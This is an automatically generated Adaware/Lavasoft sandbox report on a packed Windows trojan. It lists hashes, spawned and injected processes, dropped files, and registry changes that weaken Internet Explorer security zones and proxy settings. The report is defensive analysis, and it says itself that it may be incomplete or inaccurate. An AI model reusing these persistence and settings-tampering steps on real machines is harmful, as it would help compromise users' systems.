Gen.Variant.Kazy.202598_353f881950 – Adaware

Trojan.Win32.Yoddos.vqa (Kaspersky), Gen:Variant.Kazy.202598 (B) (Emsisoft), Gen:Variant.Kazy.202598 (AdAware), Trojan.Win32.Swrort.3.FD, GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: 353f881950e6de185c9070fc4b158bd8

SHA1: dd0751b9015b331e55ae36e16921c337cd7e4d7c

SHA256: 74c23477507e1ff67580b3f27a3e06d040a3844db9955facda385be164a48ec9

SSDeep: 98304:eoqowFkRF8IsllQk9Z7hEydAkrpSfJ4O7NuLP:qiFC5JbIB307

Size: 3887109 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: PolyEnE001byLennartHedlund, UPolyXv05_v6

Company: Xacti, LLC

Created at: 2014-09-30 16:54:56

Analyzed on: WindowsXP SP3 32-bit

Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

nvsvc32.exe:2544
hdptlk.exe:2556
ndis500.exe:2916
yYJSx.exe:1976
appmon.exe:3368
%original file name%.exe:228
MiniIE.exe:2752
ndsqp.exe:2956
tray.exe:3316
traytp.exe:452
ndislib.exe:3296

The Trojan injects its code into the following process(es):

Cattle.exe:3444
Explorer.EXE:1572

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process nvsvc32.exe:2544 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%WinDir%\HpE\wow64\configWord.cf (676 bytes)
%WinDir%\HpE\wow64\rebuild.exe (8147 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0HUL6ZQ7\hotkey[1].txt (676 bytes)
%System%\cBLK.dll (2341 bytes)
%System%\clk.ini (186 bytes)
%WinDir%\HpE\wow64\DProEx.sys (1176 bytes)
%WinDir%\HpE\wow64\reTcp.sys (588 bytes)
%WinDir%\HpE\wow64\config.ini (98 bytes)

The Trojan deletes the following file(s):

%System%\cmd.exe (0 bytes)

The process ndis500.exe:2916 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%WinDir%\HpE\sys32\weblog.log (263 bytes)
%WinDir%\HpE\sys32\m0gtv9N (3809 bytes)
%WinDir%\HpE\sys32\xp28p2U.sys (22 bytes)

The Trojan deletes the following file(s):

%WinDir%\HpE\sys32\m0gtv9N (0 bytes)
%WinDir%\HpE\sys32\xp28p2U.sys (0 bytes)

The process yYJSx.exe:1976 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\evaqocv.txt (17 bytes)
%System%\tl.dat (13 bytes)
%System%\bc.dat (3808 bytes)
%System%\tl.txt (1444 bytes)
%WinDir%\HpE\First.txt (23220 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\yfodbgl.txt (2321 bytes)
%WinDir%\HpE\sys32\urlnav.txt (14076 bytes)
%System%\ndislib.exe (243 bytes)
%WinDir%\HpE\hdptlk.exe (139 bytes)
%WinDir%\HpE\sys32\tray.txt (221016 bytes)
%WinDir%\HpE\wow64\nvsvc32.exe (17629 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tcueuqo.txt (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mwgxskf.txt (673 bytes)
%WinDir%\HpE\exec\traytp.exe (1794 bytes)
%WinDir%\HpE\wow64\nvsvc32.txt (448324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\lfllrdu.txt (15278 bytes)
%WinDir%\HpE\MiniIE.txt (175005 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\przmycg.txt (673 bytes)
%System%\ndislib.txt (40972 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sccppeu.txt (13122 bytes)
%System%\bc.txt (127812 bytes)
%WinDir%\HpE\MiniIE.exe (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uwvmjte.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mxezyyf.txt (7345 bytes)
%WinDir%\HpE\sys32\ndis500.exe (325 bytes)
%WinDir%\HpE\sys32\whitelist.dat (2 bytes)
%WinDir%\HpE\sys32\urlnav.dll (83 bytes)
%System%\appmon.exe (9606 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ihutphk.txt (1425 bytes)
%WinDir%\HpE\sys32\tray.exe (7972 bytes)
%WinDir%\HpE\sys32\whitelist.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\rhkqvcb.txt (26096 bytes)
%WinDir%\HpE\sys32\ndis500.txt (55748 bytes)
%System%\lhc.txt (32148 bytes)
%WinDir%\HpE\sys32\ndsqp.exe (106 bytes)
%WinDir%\HpE\exec\traytp.txt (88420 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\oqgrsfe.txt (10177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nagsjof.txt (601 bytes)
%WinDir%\HpE\flist.bin (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ipobzxt.txt (4545 bytes)
%System%\drivers\HideSys.sys (15 bytes)
%System%\appmon.txt (263811 bytes)
%System%\lhc.dat (185 bytes)
%WinDir%\HpE\sys32\ndsqp.txt (17980 bytes)

The process appmon.exe:3368 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%WinDir%\Temp\AdbWinUsbApi.dll (60 bytes)
%WinDir%\Temp\adbWinpi.dll (304 bytes)
%WinDir%\Temp\Cattle.exe (3727 bytes)
%WinDir%\Temp\AdbWinApi.dll (96 bytes)
%WinDir%\Temp\TscServer.exe (1653 bytes)

The process %original file name%.exe:228 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8LG56LOL\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\PYJT5JHI\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0HUL6ZQ7\desktop.ini (67 bytes)
%System%\LQdhJ\yYJSx.exe (414 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4IK7RMW\desktop.ini (67 bytes)

The process ndsqp.exe:2956 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%WinDir%\HpE\sys32\weblog.log (585 bytes)
%WinDir%\HpE\sys32\oK455Vp (13 bytes)
%WinDir%\HpE\sys32\z7AQ9Ew.sys (22 bytes)

The Trojan deletes the following file(s):

%WinDir%\HpE\sys32\oK455Vp (0 bytes)
%WinDir%\HpE\sys32\z7AQ9Ew.sys (0 bytes)

The process tray.exe:3316 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%WinDir%\HpE\sys32\services.exe (3904 bytes)

The process traytp.exe:452 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%WinDir%\HpE\exec\ico.ini (292 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8LG56LOL\statbar[1].ini (152 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\traytp.lnk (640 bytes)

The process ndislib.exe:3296 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%System%\v9pce8W (1629 bytes)
%System%\weblog.log (349 bytes)
%System%\gy17y1D.sys (22 bytes)

The Trojan deletes the following file(s):

%System%\v9pce8W (0 bytes)
%System%\gy17y1D.sys (0 bytes)

Registry activity

The process nvsvc32.exe:2544 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"WarnOnZoneCrossing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1609" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCR\Microsoft.IE]
"(Default)" = "%WinDir%\HpE\wow64\rebuild.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\123]
"HomePage" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E F9 A4 E8 40 EC 6D 61 0B 7E 1F AF 80 CE 12 74"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKLM\System\CurrentControlSet\Services\DProEx]
[HKLM\System\CurrentControlSet\Services\FixTool\Enum]
[HKLM\System\CurrentControlSet\Services\FixTool\Security]
[HKLM\System\CurrentControlSet\Services\DProEx\Enum]
[HKLM\System\CurrentControlSet\Services\FixTool]
[HKLM\System\CurrentControlSet\Services\DProEx\Security]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process hdptlk.exe:2556 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\0\win32]
"(Default)" = "%WinDir%\HpE\sys32\urlnav.dll"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\ProgID]
"(Default)" = "Urlnav.Nav.1"

[HKCR\Urlnav.Nav]
"(Default)" = "Nav Class"

[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0]
"(Default)" = "urlnav 1.0 Type Library"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}]
"(Default)" = "Nav Class"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Error Dlg Displayed On Every Error" = "no"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"DefaultValue" = "yes"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Urlnav.Nav.1]
"(Default)" = "Nav Class"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\TypeLib]
"Version" = "1.0"

[HKCR\Urlnav.Nav.1\CLSID]
"(Default)" = "{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"CheckedValue" = "yes"

[HKCR\Urlnav.Nav\CLSID]
"(Default)" = "{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}"

[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"UncheckedValue" = "no"

[HKCU\Software\Microsoft\Internet Explorer\New Windows]
"PopupMgr" = "no"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\VersionIndependentProgID]
"(Default)" = "Urlnav.Nav"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 25 ED 45 9E EA 26 3B 22 EC 5B F9 23 D4 A4 EC"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}]
"(Default)" = "INav"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\TypeLib]
"(Default)" = "{40195CA5-4EA4-4B10-88B3-5659A0A5310B}"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\InprocServer32]
"(Default)" = "%WinDir%\HpE\sys32\urlnav.dll"

[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\HELPDIR]
"(Default)" = "%WinDir%\HpE\sys32\"

The process Cattle.exe:3444 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AD 32 30 F8 40 1A 87 6C B9 71 22 D2 A7 1C 4B 3D"

The process ndis500.exe:2916 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 15 B6 36 09 56 56 81 4F 4C 6F EB 9D D1 BD 06"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKLM\System\CurrentControlSet\Services\lf3qZKD\Enum]
[HKLM\System\CurrentControlSet\Services\lf3qZKD\Security]
[HKLM\System\CurrentControlSet\Services\lf3qZKD]

The process yYJSx.exe:1976 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3E 24 F8 5D 45 D7 83 69 E9 0E 49 A2 2F 38 B9 86"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The process appmon.exe:3368 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 B9 63 7A E1 CE 31 05 6D D3 6D 47 51 32 E1 D1"

The process %original file name%.exe:228 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "00 1A 04 5F 39 2C 57 66 95 F8 4B 10 42 E7 97 B1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process MiniIE.exe:2752 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 0A 14 13 3E 46 6C 22 03 26 65 B4 F9 35 D6 04"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"DefaultValue" = "yes"

[HKCR\Microsoft.PubIE]
"(Default)" = "%WinDir%\HpE\MiniIE.exe"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"DisableScriptDebuggerIE" = "yes"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"CheckedValue" = "yes"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"CheckedValue" = "yes"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCRIPTURL_MITIGATION]
"MiniIE.exe" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1601" = "0"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"UncheckedValue" = "no"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"UncheckedValue" = "no"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPerServer" = "10"
"MaxConnectionsPer1_0Server" = "10"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Disable Script Debugger" = "yes"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"DefaultValue" = "yes"

The process ndsqp.exe:2956 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC 05 C7 C8 F2 40 05 76 5F 84 40 05 CD 63 B2 3B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKLM\System\CurrentControlSet\Services\n1P2bmf\Security]
[HKLM\System\CurrentControlSet\Services\n1P2bmf]
[HKLM\System\CurrentControlSet\Services\n1P2bmf\Enum]

The process tray.exe:3316 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 1D E8 4C A5 82 0E 16 7C 1A D1 51 96 20 02 BC"

The process traytp.exe:452 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

